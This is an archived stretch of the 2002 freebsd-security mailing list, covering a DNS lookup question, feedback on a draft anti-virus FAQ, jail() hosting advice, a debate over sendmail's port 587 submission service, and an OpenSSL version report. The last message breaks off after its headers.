Campbell , freebsd-security@FreeBSD.ORG From: Mark.Andrews@isc.org Subject: Re: Very peculiar mail-list behaviour In-reply-to: Your message of "Thu, 05 Sep 2002 21:24:22 MST." <3D782DF6.D042B93@ocnetworking.com> Date: Fri, 06 Sep 2002 14:36:18 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I think it a DNS problem... > ---------------- > /home/me $ nslookup neotext.ca > Server: ns1.oc.cox.net > Address: 68.4.16.30 > > *** ns1.oc.cox.net can't find neotext.ca: Non-existent host/domain > --------------- No. Just a nslookup issue and searching. Mark ; <<>> DiG 8.3 <<>> mx neotext.ca ;; res options: init recurs defnam dnsrch ;; got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 2 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 3, ADDITIONAL: 0 ;; QUERY SECTION: ;; neotext.ca, type = MX, class = IN ;; ANSWER SECTION: neotext.ca. 5h58m34s IN MX 100 babayaga.neotext.ca. ;; AUTHORITY SECTION: neotext.ca. 5h58m34s IN NS kaska.taiga.ca. neotext.ca. 5h58m34s IN NS tagish.taiga.ca. neotext.ca. 5h58m34s IN NS babayaga.neotext.ca. ;; Total query time: 1 msec ;; FROM: drugs.dv.isc.org to SERVER: default -- 127.0.0.1 ;; WHEN: Fri Sep 6 14:33:37 2002 ;; MSG SIZE sent: 28 rcvd: 114 > > Dylan > > Duncan Campbell wrote: > > > Gentlemen (&Ladies); > > > > A very peculiar thing is happening with regards to this > > list and other freebsd mail lists: I am unable to sign > > up from any mail account originating from my domain, > > neotext.ca. > > > > Is this some new, unwritten, policy, or just a bug? > > > > Inquiring minds wish to know... > > > > Duncan (Dhu) Campbell > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Mark Andrews, Internet Software Consortium 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@isc.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 6 11:21:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6B6C637B400; Fri, 6 Sep 2002 11:21:19 -0700 (PDT) Received: from smtp.comcast.net (smtp.comcast.net [24.153.64.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 194A443E7B; Fri, 6 Sep 2002 11:21:19 -0700 (PDT) (envelope-from lomifeh@earthlink.net) Received: from bgp586692bgs.jdover01.nj.comcast.net (bgp586692bgs.jdover01.nj.comcast.net [68.39.202.147]) by mtaout04.icomcast.net (iPlanet Messaging Server 5.1 HotFix 0.8 (built May 13 2002)) with ESMTP id <0H2100E354B61L@mtaout04.icomcast.net>; Fri, 06 Sep 2002 14:21:06 -0400 (EDT) Date: Fri, 06 Sep 2002 14:21:06 -0400 From: Lawrence Sica Subject: Anti-virus section for FAQ In-reply-to: <15776D82-C02B-11D6-9B5E-0050E4A0BB3F@anarcat.ath.cx> To: freebsd-security@FreeBSD.ORG Cc: freebsd-doc@freebsd.org Message-id: <68905DC2-C1C5-11D6-A71E-000393A335A2@earthlink.net> MIME-version: 1.0 X-Mailer: Apple Mail (2.543) Content-type: text/plain; charset=US-ASCII; format=flowed Content-transfer-encoding: 7BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I have put together a quick FAQ section on FreeBSD AV software and interface. Let me know what all of you think. If you have any additions please let me know. Same with comments/suggestions. If all is well I'll mark it up for the FAQ, I'd love to get it added to the official FAQ if possible. Be gentle it's my first time ;) TIA, Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 6 11:23:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9092537B400; Fri, 6 Sep 2002 11:23:50 -0700 (PDT) Received: from smtp.comcast.net (smtp.comcast.net [24.153.64.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4252243E6E; Fri, 6 Sep 2002 11:23:50 -0700 (PDT) (envelope-from lomifeh@earthlink.net) Received: from bgp586692bgs.jdover01.nj.comcast.net (bgp586692bgs.jdover01.nj.comcast.net [68.39.202.147]) by mtaout01.icomcast.net (iPlanet Messaging Server 5.1 HotFix 0.8 (built May 13 2002)) with ESMTP id <0H2100B024FIRF@mtaout01.icomcast.net>; Fri, 06 Sep 2002 14:23:42 -0400 (EDT) Date: Fri, 06 Sep 2002 14:23:43 -0400 From: Lawrence Sica Subject: Fwd: Anti-virus section for FAQ To: freebsd-security@FreeBSD.ORG Cc: freebsd-doc@freebsd.org Message-id: MIME-version: 1.0 X-Mailer: Apple Mail (2.543) Content-type: text/plain; charset=US-ASCII; format=flowed Content-transfer-encoding: 7BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Oops, helps if I post the url eh ;) http://www.thesicafamily.org/larry/articles/avfaq.html Sorry about that. Begin forwarded message: > From: Lawrence Sica > Date: Fri Sep 6, 2002 2:21:06 PM US/Eastern > To: > Cc: freebsd-doc@freebsd.org > Subject: Anti-virus section for FAQ > > I have put together a quick FAQ section on FreeBSD AV software and > interface. Let me know what all of you think. If you have any > additions please let me know. Same with comments/suggestions. > > If all is well I'll mark it up for the FAQ, I'd love to get it added > to the official FAQ if possible. Be gentle it's my first time ;) > > > TIA, > > Larry > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 6 11:50: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4312137B400 for ; Fri, 6 Sep 2002 11:49:49 -0700 (PDT) Received: from web10101.mail.yahoo.com (web10101.mail.yahoo.com [216.136.130.51]) by mx1.FreeBSD.org (Postfix) with SMTP id B54D243E4A for ; Fri, 6 Sep 2002 11:49:48 -0700 (PDT) (envelope-from twigles@yahoo.com) Message-ID: <20020906184948.4405.qmail@web10101.mail.yahoo.com> Received: from [68.5.49.41] by web10101.mail.yahoo.com via HTTP; Fri, 06 Sep 2002 11:49:48 PDT Date: Fri, 6 Sep 2002 11:49:48 -0700 (PDT) From: twig les Subject: Re: Fwd: Anti-virus section for FAQ To: Lawrence Sica , freebsd-security@FreeBSD.ORG Cc: freebsd-doc@freebsd.org In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I like it. Documentation that is short, to the point and works. --- Lawrence Sica wrote: > Oops, helps if I post the url eh ;) > > http://www.thesicafamily.org/larry/articles/avfaq.html > > Sorry about that. > > Begin forwarded message: > > > From: Lawrence Sica > > Date: Fri Sep 6, 2002 2:21:06 PM US/Eastern > > To: > > Cc: freebsd-doc@freebsd.org > > Subject: Anti-virus section for FAQ > > > > I have put together a quick FAQ section on FreeBSD > AV software and > > interface. Let me know what all of you think. If > you have any > > additions please let me know. Same with > comments/suggestions. > > > > If all is well I'll mark it up for the FAQ, I'd > love to get it added > > to the official FAQ if possible. Be gentle it's > my first time ;) > > > > > > TIA, > > > > Larry > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Heavy metal made me do it. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! Health - Feel better, live better http://health.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 6 11:58:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D9EBD37B400 for ; Fri, 6 Sep 2002 11:58:14 -0700 (PDT) Received: from web12803.mail.yahoo.com (web12803.mail.yahoo.com [216.136.174.38]) by mx1.FreeBSD.org (Postfix) with SMTP id 9511F43E4A for ; Fri, 6 Sep 2002 11:58:14 -0700 (PDT) (envelope-from zaunere@yahoo.com) Message-ID: <20020906185814.71834.qmail@web12803.mail.yahoo.com> Received: from [128.122.155.151] by web12803.mail.yahoo.com via HTTP; Fri, 06 Sep 2002 11:58:14 PDT Date: Fri, 6 Sep 2002 11:58:14 -0700 (PDT) From: Hans Zaunere Subject: jail() House Rock To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm looking to provide jail()'d root access to clients (the virtual private server bit). I myself have been a client on several of these setups, and while some are better than others, I often find missing and broken features - and I've never even looked at it from a security standpoint. Aside from the commonly known man pages/handbooks/etc is there a definitve source for PROPERLY setting one of these systems up? Something that outlines what features mean decreased security? Something that outlines proper layout of these systems? Then I can judge exactly what and what not to offer. I already have a good handle on security of regular systems, so something specific to the jail()'d environment would be best, as I'm sure there are some gotchas and such. Thank you, Hans __________________________________________________ Do You Yahoo!? Yahoo! Finance - Get real-time stock quotes http://finance.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 6 12:46:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D2E7537B4DC for ; Fri, 6 Sep 2002 12:46:37 -0700 (PDT) Received: from ns3.ideathcare.com (mail.allneo.com [216.185.96.68]) by mx1.FreeBSD.org (Postfix) with SMTP id CE8E743E77 for ; Fri, 6 Sep 2002 12:46:36 -0700 (PDT) (envelope-from jps@funeralexchange.com) Received: (qmail 993 invoked by uid 85); 6 Sep 2002 19:59:56 -0000 Received: from jps@funeralexchange.com by ns3.ideathcare.com with qmail-scanner-1.03 (uvscan: v4.1.40/v4121. . Clean. Processed in 0.171496 secs); 06 Sep 2002 19:59:56 -0000 Received: from unknown (HELO pimpin) (216.138.114.143) by mail.allneo.com with SMTP; 6 Sep 2002 19:59:55 -0000 Reply-To: From: "Jeremy Suo-Anttila" To: "twig les" , "Lawrence Sica" , Cc: Subject: RE: Fwd: Anti-virus section for FAQ Date: Fri, 6 Sep 2002 14:52:43 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Importance: Normal In-Reply-To: <20020906184948.4405.qmail@web10101.mail.yahoo.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org There is no mention of the qmail-scanner package that is available for qmail based servers. Might want to add that also qmail-scanner.sourceforge.net Thanks Jeremy Suo-Anttila jps@funeralexchange.com -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of twig les Sent: Friday, September 06, 2002 1:50 PM To: Lawrence Sica; freebsd-security@FreeBSD.ORG Cc: freebsd-doc@freebsd.org Subject: Re: Fwd: Anti-virus section for FAQ I like it. Documentation that is short, to the point and works. --- Lawrence Sica wrote: > Oops, helps if I post the url eh ;) > > http://www.thesicafamily.org/larry/articles/avfaq.html > > Sorry about that. > > Begin forwarded message: > > > From: Lawrence Sica > > Date: Fri Sep 6, 2002 2:21:06 PM US/Eastern > > To: > > Cc: freebsd-doc@freebsd.org > > Subject: Anti-virus section for FAQ > > > > I have put together a quick FAQ section on FreeBSD > AV software and > > interface. Let me know what all of you think. If > you have any > > additions please let me know. Same with > comments/suggestions. > > > > If all is well I'll mark it up for the FAQ, I'd > love to get it added > > to the official FAQ if possible. Be gentle it's > my first time ;) > > > > > > TIA, > > > > Larry > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Heavy metal made me do it. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! Health - Feel better, live better http://health.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 6 13:47:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8E20E37B400 for ; Fri, 6 Sep 2002 13:47:06 -0700 (PDT) Received: from www.cotse.net (www.cotse.net [216.112.42.60]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5B7D143E3B for ; Fri, 6 Sep 2002 13:47:05 -0700 (PDT) (envelope-from john@cotse.com) Received: from www.cotse.net (www.cotse.net[216.112.42.60]) (authenticated bits=0) by www.cotse.net (8.12.5/8.12.5) with ESMTP id g86KrlSr079070; Fri, 6 Sep 2002 16:53:49 -0400 (EDT) (envelope-from john@cotse.com) Message-Id: <5.1.0.14.2.20020906164529.03768560@pop.cotse.com> X-Sender: johnh@pop.cotse.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Fri, 06 Sep 2002 16:46:38 -0400 To: Lawrence Sica From: John Holstein Subject: Re: Fwd: Anti-virus section for FAQ Cc: freebsd-security@FreeBSD.ORG In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org nice. would be good to see the actual URL in the page, rather than a simple link, for printing purposes.... just my .02c John Holstein At 02:23 PM 9/6/2002 -0400, you wrote: >Oops, helps if I post the url eh ;) > >http://www.thesicafamily.org/larry/articles/avfaq.html > >Sorry about that. > >Begin forwarded message: > >>From: Lawrence Sica >>Date: Fri Sep 6, 2002 2:21:06 PM US/Eastern >>To: >>Cc: freebsd-doc@freebsd.org >>Subject: Anti-virus section for FAQ >> >>I have put together a quick FAQ section on FreeBSD AV software and >>interface. Let me know what all of you think. If you have any additions >>please let me know. Same with comments/suggestions. >> >>If all is well I'll mark it up for the FAQ, I'd love to get it added to >>the official FAQ if possible. Be gentle it's my first time ;) >> >> >>TIA, >> >>Larry > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 6 15:16:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6FE4337B400 for ; Fri, 6 Sep 2002 15:16:19 -0700 (PDT) Received: from web12805.mail.yahoo.com (web12805.mail.yahoo.com [216.136.174.40]) by mx1.FreeBSD.org (Postfix) with SMTP id 203F943E65 for ; Fri, 6 Sep 2002 15:16:19 -0700 (PDT) (envelope-from zaunere@yahoo.com) Message-ID: <20020906221618.98815.qmail@web12805.mail.yahoo.com> Received: from [66.114.70.134] by web12805.mail.yahoo.com via HTTP; Fri, 06 Sep 2002 15:16:18 PDT Date: Fri, 6 Sep 2002 15:16:18 -0700 (PDT) From: Hans Zaunere Subject: Re: jail() House Rock To: Travis Stevenson Cc: freebsd-security@freebsd.org In-Reply-To: <20020906211112.D6190492644@hermes.maverik.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Does this occur only within the jail or outside as well? Thanks, Hans --- Travis Stevenson wrote: > The problems I have seen is some wackiness with syslogd and > I have trouble using ^C to cancel some interactive > programs. I have to ^Z and then a kill. When syslogd does > a rotation It stops logging to /var/log/messages. > Sometimes a kill of syslogd and restarting the programs > that log to it helps. Other times I have to restart jail. > > --Travis > > Hans Zaunere said: > > > > > I'm looking to provide jail()'d root access to clients > (the virtual > > private server bit). I myself have been a client on > several of these > > setups, and while some are better than others, I often > find missing and > > broken features - and I've never even looked at it from a > security > > standpoint. > > > > Aside from the commonly known man pages/handbooks/etc is > there a > > definitve source for PROPERLY setting one of these > systems up? > > Something that outlines what features mean decreased > security? > > Something that outlines proper layout of these systems? > Then I can > > judge exactly what and what not to offer. I already have > a good handle > > on security of regular systems, so something specific to > the jail()'d > > environment would be best, as I'm sure there are some > gotchas and such. > > > > Thank you, > > > > Hans > > > > > > > > __________________________________________________ > > Do You Yahoo!? > > Yahoo! Finance - Get real-time stock quotes > > http://finance.yahoo.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the > message > > > > > > > > -- > > > __________________________________________________ Do You Yahoo!? Yahoo! Finance - Get real-time stock quotes http://finance.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 6 15:23:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E8E4737B405 for ; Fri, 6 Sep 2002 15:23:12 -0700 (PDT) Received: from unix.megared.net.mx (megamail.megared.com.mx [200.52.207.52]) by mx1.FreeBSD.org (Postfix) with ESMTP id AE47C43E72 for ; Fri, 6 Sep 2002 15:23:11 -0700 (PDT) (envelope-from jose.esteban@plazanetwork.com) Received: from bebo ([10.38.93.177]) by unix.megared.net.mx (8.11.6/8.11.6) with ESMTP id g86MNsq61847 for ; Fri, 6 Sep 2002 17:23:54 -0500 (CDT) (envelope-from jose.esteban@plazanetwork.com) From: "Jose Esteban Esquer Biskofski" To: Subject: asmtp 587 Date: Fri, 6 Sep 2002 17:23:57 -0500 Message-ID: <000001c255f4$179c0fc0$0800a8c0@bebo> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 In-Reply-To: <20020906221618.98815.qmail@web12805.mail.yahoo.com> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, Ive been looking for information on what sendmail's asmtp (port 587) is exactly, and how to close it. Ive had no luck, could someone please tell me how to get rid of it? Thanks. Jose Esteban Esquer Biskofski PlazaNetwork.Net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 6 15:29:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CB6DE37B400 for ; Fri, 6 Sep 2002 15:29:35 -0700 (PDT) Received: from orthanc.ab.ca (orthanc.ab.ca [216.123.203.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3C5B643E3B for ; Fri, 6 Sep 2002 15:29:35 -0700 (PDT) (envelope-from lyndon@orthanc.ab.ca) Received: from orthanc.ab.ca (localhost.orthanc.ab.ca [127.0.0.1]) by orthanc.ab.ca (8.12.5/8.12.5) with ESMTP id g86MTX3j042290; Fri, 6 Sep 2002 16:29:33 -0600 (MDT) (envelope-from lyndon@orthanc.ab.ca) Message-Id: <200209062229.g86MTX3j042290@orthanc.ab.ca> From: Lyndon Nerenberg Organization: The Frobozz Magic Homing Pigeon Company To: "Jose Esteban Esquer Biskofski" Cc: freebsd-security@FreeBSD.ORG Subject: Re: asmtp 587 In-reply-to: Your message of "Fri, 06 Sep 2002 17:23:57 CDT." <000001c255f4$179c0fc0$0800a8c0@bebo> X-Mailer: mh-e 6.1+cvs; MH 6.8.4; Emacs 21.2 Date: Fri, 06 Sep 2002 16:29:33 -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> "Jose" == Jose Esteban Esquer Biskofski writes: Jose> Hello, Ive been looking for information on what sendmail's Jose> asmtp (port 587) is exactly, and how to close it. Ive had no Jose> luck, could someone please tell me how to get rid of it? Jose> Thanks. Port 587 is the Mail Submission service (RFC 2476), and instead of turning it off you should learn what it's for and then configure your MUAs to use it. --lyndon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 6 16: 7:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D36B837B400 for ; Fri, 6 Sep 2002 16:07:39 -0700 (PDT) Received: from web12808.mail.yahoo.com (web12808.mail.yahoo.com [216.136.174.43]) by mx1.FreeBSD.org (Postfix) with SMTP id 5F10343E91 for ; Fri, 6 Sep 2002 16:07:23 -0700 (PDT) (envelope-from zaunere@yahoo.com) Message-ID: <20020906230716.99501.qmail@web12808.mail.yahoo.com> Received: from [66.114.70.134] by web12808.mail.yahoo.com via HTTP; Fri, 06 Sep 2002 16:07:16 PDT Date: Fri, 6 Sep 2002 16:07:16 -0700 (PDT) From: Hans Zaunere Subject: Re: asmtp 587 To: Lyndon Nerenberg , Jose Esteban Esquer Biskofski Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <200209062229.g86MTX3j042290@orthanc.ab.ca> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --- Lyndon Nerenberg wrote: > >>>>> "Jose" == Jose Esteban Esquer Biskofski > writes: > > Jose> Hello, Ive been looking for information on what sendmail's > Jose> asmtp (port 587) is exactly, and how to close it. Ive had > no > Jose> luck, could someone please tell me how to get rid of it? > Jose> Thanks. > > Port 587 is the Mail Submission service (RFC 2476), and instead of > turning it off you should learn what it's for and then configure > your MUAs to use it. I disagree. I've been through docs/RFCs/etc and I have yet to see it's purpose. As far as I can tell, it's just sendmail listening on another port. The pertinent line in /etc/mail/sendmail.cf: 0 DaemonPortOptions=Port=587, Name=MSA, M=E and I've commented it out. If someone can tell me how I'm supposed to talk to it, I'd be interested - otherwise I see it just as an immature default. And, if it's setup for MUAs, why does it listen on all IPs? Just localhost, no? Thanks, Hans > > --lyndon > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message __________________________________________________ Do You Yahoo!? Yahoo! Finance - Get real-time stock quotes http://finance.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Sep 6 17:39:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E939A37B400; Fri, 6 Sep 2002 17:39:39 -0700 (PDT) Received: from smtp.comcast.net (smtp.comcast.net [24.153.64.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4C3EA43E3B; Fri, 6 Sep 2002 17:39:39 -0700 (PDT) (envelope-from lomifeh@earthlink.net) Received: from bgp586692bgs.jdover01.nj.comcast.net (bgp586692bgs.jdover01.nj.comcast.net [68.39.202.147]) by mtaout05.icomcast.net (iPlanet Messaging Server 5.1 HotFix 0.8 (built May 13 2002)) with ESMTP id <0H210086OLU2H0@mtaout05.icomcast.net>; Fri, 06 Sep 2002 20:39:38 -0400 (EDT) Date: Fri, 06 Sep 2002 20:39:38 -0400 From: Lawrence Sica Subject: Re: Anti-virus section for FAQ In-reply-to: <20020906223033.69179.qmail@web14601.mail.yahoo.com> To: Jerry Murdock Cc: freebsd-security@FreeBSD.ORG, freebsd-doc@freebsd.org Message-id: <4A393ABF-C1FA-11D6-9989-000393A335A2@earthlink.net> MIME-version: 1.0 X-Mailer: Apple Mail (2.543) Content-type: text/plain; charset=US-ASCII; format=flowed Content-transfer-encoding: 7BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Friday, September 6, 2002, at 06:30 PM, Jerry Murdock wrote: > ----- Original Message ----- > From: "Lawrence Sica" > To: > Cc: > Sent: Friday, September 06, 2002 2:23 PM > Subject: Fwd: Anti-virus section for FAQ > >> Oops, helps if I post the url eh ;) >> >> http://www.thesicafamily.org/larry/articles/avfaq.html >> >> Sorry about that. >> > > I'd add a disclaimer to check licensing on the scanners. Some are > free for > personal use, none are free for commercial use. Some like McAfee will > require > a license for each mailbox, others are per-server, others per-domain. > > F-Prot (www.f-prot.com) certainly needs to be mentioned. It's better > than most, > is free for personal use, and has reasonable "per server" pricing for > commercial use. > I thought I had this in there, must have fallen off my list. Thanks. > Trend VirusWall (www.antivirus.com) should be mentioned under both > http and > mail scanner sections. It's linux, but is rock solid under FBSD > emulation. > It's only really viable http option IMO. > Ok, good to know > http://www.pcxperience.org/dgvirus/ should probably be mentioned under > the http > section. It's a dansguardian customization that is the most promising > open > source http scanner I've seen. Still young though, and I haven't > tested on > freebsd. > > http://viralator.loddington.com/ probably needs a mention under http > section as > well. > > http://www.openantivirus.org needs mentioning in all sections. > Nothing there > is production quality IMO, but the exposure can only help. > I'll check these out. thanks. --Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 7 20:28:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BE45537B400 for ; Sat, 7 Sep 2002 20:28:51 -0700 (PDT) Received: from localhost.neotext.ca (h24-70-64-200.ed.shawcable.net [24.70.64.200]) by mx1.FreeBSD.org (Postfix) with ESMTP id C039843E3B for ; Sat, 7 Sep 2002 20:28:50 -0700 (PDT) (envelope-from freebsd@babayaga.neotext.ca) Received: from babayaga.neotext.ca (localhost.neotext.ca [127.0.0.1]) by localhost.neotext.ca (8.12.5/8.12.5) with ESMTP id g883UHNM000522 for ; Sat, 7 Sep 2002 21:30:17 -0600 (MDT) (envelope-from freebsd@babayaga.neotext.ca) From: "Duncan Patton a Campbell is Dhu" To: freebsd-security@FreeBSD.ORG Subject: OpenSSL (agin) Date: Sat, 7 Sep 2002 21:30:17 -0600 Message-Id: <20020908033017.M92241@babayaga.neotext.ca> In-Reply-To: <200209062229.g86MTX3j042290@orthanc.ab.ca> References: Your message of "Fri, 06 Sep 2002 17:23:57 CDT." <000001c255f4$179c0fc0$0800a8c0@bebo> <200209062229.g86MTX3j042290@orthanc.ab.ca> X-Mailer: Open WebMail 1.70 20020712 X-OriginatingIP: 127.0.0.1 (freebsd) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I just installed a system from the net using 4.6.2-RELEASE floppies and it installed openssl 9.6e, not g. Duncan Patton a Campbell is Duihb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 7 22:21: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4145E37B400 for ; Sat, 7 Sep 2002 22:20:59 -0700 (PDT) Received: from seven.Alameda.net (seven.Alameda.net [64.81.63.137]) by mx1.FreeBSD.org (Postfix) with ESMTP id CF51343E4A for ; Sat, 7 Sep 2002 22:20:58 -0700 (PDT) (envelope-from ulf@Alameda.net) Received: by seven.Alameda.net (Postfix, from userid 1000) id 67BAE3A204; Sat, 7 Sep 2002 22:20:58 -0700 (PDT) Date: Sat, 7 Sep 2002 22:20:58 -0700 From: Ulf Zimmermann To: Duncan Patton a Campbell is Dhu Cc: freebsd-security@FreeBSD.ORG Subject: Re: OpenSSL (agin) Message-ID: <20020907222058.C65100@seven.alameda.net> Reply-To: ulf@Alameda.net 